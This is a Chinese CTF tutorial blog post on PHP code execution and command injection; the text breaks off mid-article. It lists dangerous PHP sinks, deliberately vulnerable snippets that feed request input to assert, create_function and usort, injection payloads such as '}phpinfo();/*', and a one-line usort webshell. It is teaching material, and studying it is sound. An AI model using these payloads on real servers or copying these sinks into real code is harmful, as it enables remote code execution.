<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Ethan">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Ethan">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="一花一世界，一木一森林">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>CTF命令执行及绕过技巧 · Ethan&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/ethan.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Ethan&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">CTF命令执行及绕过技巧</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Ethan's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            CTF命令执行及绕过技巧
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="命令注入，攻防">命令注入，攻防</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">3.7k</span>阅读时长: <span class="post-count reading-time">15 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/03/07</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h5 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h5><p>今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列！今天开启php代码审计系列！</p>
<p>今天内容主要是CTF中命令注入及绕过的一些技巧！以及构成RCE的一些情景！</p>
<a id="more"></a>
<p>@[toc]</p>
<h5 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h5><p>在详细介绍命令注入之前，有一点需要注意：命令注入与远程代码执行不同。他们的区别在于，远程代码执行实际上是调用服务器网站代码进行执行，而命令注入则是调用操作系统命令进行执行。 虽然最终效果都会在目标机器执行操，但是他们还是有区别的，基于这个区别，我们如何找到并利用方式也是有所不同的！</p>
<h5 id="代码执行"><a href="#代码执行" class="headerlink" title="代码执行"></a>代码执行</h5><h6 id="代码执行的几种方式"><a href="#代码执行的几种方式" class="headerlink" title="代码执行的几种方式"></a>代码执行的几种方式</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$&#123;&#125;执行代码</span><br><span class="line"><span class="keyword">eval</span></span><br><span class="line">assert</span><br><span class="line">preg_replace</span><br><span class="line">create_function()</span><br><span class="line">array_map()</span><br><span class="line">call_user_func()/call_user_func_array()</span><br><span class="line">array_filter()</span><br><span class="line">usort(),uasort()</span><br></pre></td></tr></table></figure>
<ul>
<li><p><code>${}</code><strong>执行代码</strong></p>
<p>方法:<code>${php代码}</code></p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;phpinfo()&#125;;</span><br></pre></td></tr></table></figure>
<ul>
<li><strong><code>eval()</code>执行代码</strong></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="string">'echo 2;'</span>);</span><br></pre></td></tr></table></figure>
<ul>
<li><strong><code>assert()</code></strong></li>
</ul>
<p>普通调用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//?a=phpinfo()</span></span><br><span class="line"><span class="meta">&lt;?php</span> assert($_POST[<span class="string">'a'</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><code>assert</code>函数支持动态调用 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//?a=phpinfo()</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">'assert'</span>;</span><br><span class="line">$a($_POST[<span class="string">'a'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><strong>php官方在php7中更改了<code>assert</code>函数。在php7.0.29之后的版本不支持动态调用。</strong></p>
<p>以上两种调用方法在php7.0.29版本之前都测试成功，7.0.29版本之后又动态调用的方法无法成功。 </p>
<p>在7.0.29版本之后发现的奇怪的一点 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//?a=phpinfo()</span></span><br><span class="line">$a = <span class="string">'assert'</span>;</span><br><span class="line">$a($_POST[<span class="string">'a'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//phpinfo()无法执行成功</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">'assert'</span>;</span><br><span class="line">$a(phpinfo());</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//成功执行phpinfo()</span></span><br></pre></td></tr></table></figure>
<ul>
<li><strong>preg_replace()</strong></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = <span class="number">-1</span> [, int &amp;$count ]] )</span><br></pre></td></tr></table></figure>
<p>preg_replace 执行一个正则表达式的搜索和替换。 </p>
<p>执行代码需要使用<code>/e</code>修饰符。如果不使用<code>/e</code>修饰符，代码则不会执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$a = <span class="string">'phpinfo()'</span>;</span><br><span class="line">$b = preg_replace(<span class="string">"/abc/e"</span>,$b,<span class="string">'abcd'</span>);</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>create_function()</strong></li>
</ul>
<p>说明</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string create_function ( string $args , string $code )</span><br></pre></td></tr></table></figure>
<p>该函数用来创建匿名函数。<br> 这个函数的实现大概是这样的 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$b = create_function(<span class="string">'$name'</span>,<span class="string">'echo $name;'</span>);</span><br><span class="line"><span class="comment">//实现</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">niming</span><span class="params">($name)</span></span>&#123;</span><br><span class="line"><span class="keyword">echo</span> $name;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$b(yang);</span><br><span class="line"></span><br><span class="line">niming(<span class="string">'yang'</span>);</span><br></pre></td></tr></table></figure>
<p>第二个参数是执行代码的地方，将payload放在第二个参数的位置，然后调用该函数就可以执行payload了。<br> 执行代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$a = <span class="string">'phpinfo();'</span>;</span><br><span class="line">$b = create_function(<span class="string">" "</span>,$a);</span><br><span class="line">$b();</span><br></pre></td></tr></table></figure>
<p>上面这种方法是最直接的，接下来看一点有趣的。</p>
<p><strong>自己写的小示例</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$id=$_GET[<span class="string">'id'</span>];</span><br><span class="line"></span><br><span class="line">$code = <span class="string">'echo $name. '</span>.<span class="string">'的编号是'</span>.$id.<span class="string">'; '</span>;</span><br><span class="line"></span><br><span class="line">$b = create_function(<span class="string">'$name'</span>,$code);</span><br><span class="line"><span class="comment">//实现</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">niming</span><span class="params">($name)</span></span>&#123;</span><br><span class="line"><span class="keyword">echo</span> $name.<span class="string">"编号"</span>.$id;</span><br><span class="line">&#125;</span><br><span class="line">$b(<span class="string">'sd'</span>);</span><br></pre></td></tr></table></figure>
<p>这里直接传入<code>phpinfo</code>是不行的，构造的payload </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=2;&#125;phpinfo();/*</span><br></pre></td></tr></table></figure>
<p>传入后，代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function niming($name)&#123;</span><br><span class="line">echo $name.编号2;</span><br><span class="line">     &#125;phpinfo();/*</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这样就执行了代码，再给出网上找的一个例子。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">$sort_by = $_GET[<span class="string">'sort_by'</span>];</span><br><span class="line"></span><br><span class="line">$sorter = ‘strnatcasecmp’;</span><br><span class="line"></span><br><span class="line">$databases=<span class="keyword">array</span>(’<span class="number">1234</span>′,’<span class="number">4321</span>′);</span><br><span class="line"></span><br><span class="line">$sort_function = ‘ <span class="keyword">return</span> <span class="number">1</span> * ‘ . $sorter . ‘($a[<span class="string">"' . $sort_by . '"</span>], $b[<span class="string">"' . $sort_by . '"</span>]);’;</span><br><span class="line"></span><br><span class="line">usort($databases, create_function(‘$a, $b’, $sort_function));</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>构造的payload如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?sort_by=”]);&#125;phpinfo();<span class="comment">/*</span></span><br></pre></td></tr></table></figure>
<p>在自己写示例的时候，因为网上的一个示例纠结了挺久。<br> 代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//02-8.php?id=2;&#125;phpinfo();/*</span></span><br><span class="line">$id=$_GET[<span class="string">'id'</span>];</span><br><span class="line">$str2=<span class="string">'echo  '</span>.$a.<span class="string">'test'</span>.$id.<span class="string">";"</span>;</span><br><span class="line"><span class="keyword">echo</span> $str2;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"=============================="</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">$f1 = create_function(<span class="string">'$a'</span>,$str2);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"=============================="</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>纠结的原因是在这个例子中，构造<code>$str2</code>的时候，将变量a和变量b都写在了引号之外，但是变量a是匿名函数的参数，如果直接写在单引号外面的话，解析的时候会认为<code>$a</code>没有赋值，从而设置为空。继续往下看，匿名函数也就无法正常的执行。所以就在想办法将<code>$a</code>写在单引号里面，使其可以正常的作为匿名函数的第二个参数。</p>
<ul>
<li><strong>array_map()</strong></li>
</ul>
<p>官方文档</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span> array_map ( callable $callback , <span class="keyword">array</span> $array1 [, <span class="keyword">array</span> $... ] )</span><br><span class="line">array_map()：返回数组，是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量，两者必须一样。</span><br></pre></td></tr></table></figure>
<p>漏洞演示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//?a=assert&amp;b=phpinfo();</span></span><br><span class="line">$a = $_GET[<span class="string">'a'</span>];</span><br><span class="line">$b = $_GET[<span class="string">'b'</span>];</span><br><span class="line">$array[<span class="number">0</span>] = $b;</span><br><span class="line">$c = array_map($a,$array);</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>call_user_func()/call_user_func_array()</strong></li>
</ul>
<p>和array_map()函数挺像的。 </p>
<p>官方文档</p>
<pre><code>call_user_func()
</code></pre><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )</span><br><span class="line">第一个参数 callback 是被调用的回调函数，其余参数是回调函数的参数。</span><br></pre></td></tr></table></figure>
<p> call_user_func_array()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mixed call_user_func_array ( callable $callback , <span class="keyword">array</span> $param_arr )</span><br><span class="line">把第一个参数作为回调函数（callback）调用，把参数数组作（param_arr）为回调函数的的参数传入。</span><br></pre></td></tr></table></figure>
<p>示例</p>
<p>   call_user_func()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ?a=phpinfo();</span></span><br><span class="line">call_user_func(assert,$_GET[<span class="string">'a'</span>]);</span><br></pre></td></tr></table></figure>
<p>   call_user_func_array()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//?a=phpinfo();</span></span><br><span class="line">$array[<span class="number">0</span>] = $_GET[<span class="string">'a'</span>];</span><br><span class="line"></span><br><span class="line">call_user_func_array(<span class="string">"assert"</span>,$array);</span><br></pre></td></tr></table></figure>
<ul>
<li><strong><code>array_filter()</code></strong></li>
</ul>
<p>官方文档</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span> array_filter ( <span class="keyword">array</span> $array [, callable $callback [, int $flag = <span class="number">0</span> ]] )</span><br><span class="line"></span><br><span class="line">依次将 <span class="keyword">array</span> 数组中的每个值传递到 callback 函数。如果 callback 函数返回 <span class="keyword">true</span>，则 <span class="keyword">array</span> 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。</span><br></pre></td></tr></table></figure>
<p>示例</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$array[<span class="number">0</span>] = $_GET[<span class="string">'a'</span>];</span><br><span class="line">array_filter($array,<span class="string">'assert'</span>);</span><br></pre></td></tr></table></figure>
<ul>
<li><strong><code>usort()/uasort()</code></strong></li>
</ul>
<p><code>usrot</code>官方文档</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bool usort ( array &amp;$array , callable $value_compare_func )</span><br><span class="line">本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序，那么应该使用此函数。</span><br></pre></td></tr></table></figure>
<ul>
<li><strong><code>shell_1</code></strong> </li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// ?1[]=test&amp;1[]=phpinfo();&amp;2=assert</span></span><br><span class="line">usort(...$_GET);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>只有在php5.6以上环境才可使用<br><a href="https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html" target="_blank" rel="noopener">详解</a></p>
<p>关于<code>...$_GET</code>是php5.6引入的新特性。即将数组展开成参数的形式。</p>
<ul>
<li><strong><code>shell_2</code></strong> </li>
</ul>
<p>下面这种写法只在php5.6版本以下可以使用。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ?1=1+1&amp;2=phpinfo();</span></span><br><span class="line">usort($_GET,<span class="string">'asse'</span>.<span class="string">'rt'</span>);</span><br></pre></td></tr></table></figure>
<h5 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h5><h6 id="常见命令执行函数"><a href="#常见命令执行函数" class="headerlink" title="常见命令执行函数"></a>常见命令执行函数</h6><ul>
<li><code>system()</code><ul>
<li><code>passthru()</code></li>
<li><code>exec()</code></li>
<li><code>shell_exec()</code></li>
<li>`反引号</li>
<li><code>ob_start()</code></li>
<li><code>mail函数+LD_PRELOAD执行系统命令</code></li>
</ul>
</li>
</ul>
<ul>
<li><strong><code>system()</code></strong></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ php -r <span class="string">"system('whoami');"</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/2.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>passthru()</strong></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ php -r <span class="string">"passthru('whoami');"</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/3.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>exec()</strong></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ php -r <span class="string">"echo exec('whoami');"</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/4.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>shell_exec()</strong> </li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ php -r <span class="string">"echo shell_exec('whoami');"</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/5.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>`反引号</strong> </li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ php -r <span class="string">"echo @`whoami`;"</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/6.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>ob_start()</strong> </li>
</ul>
<p>官方文档 </p>
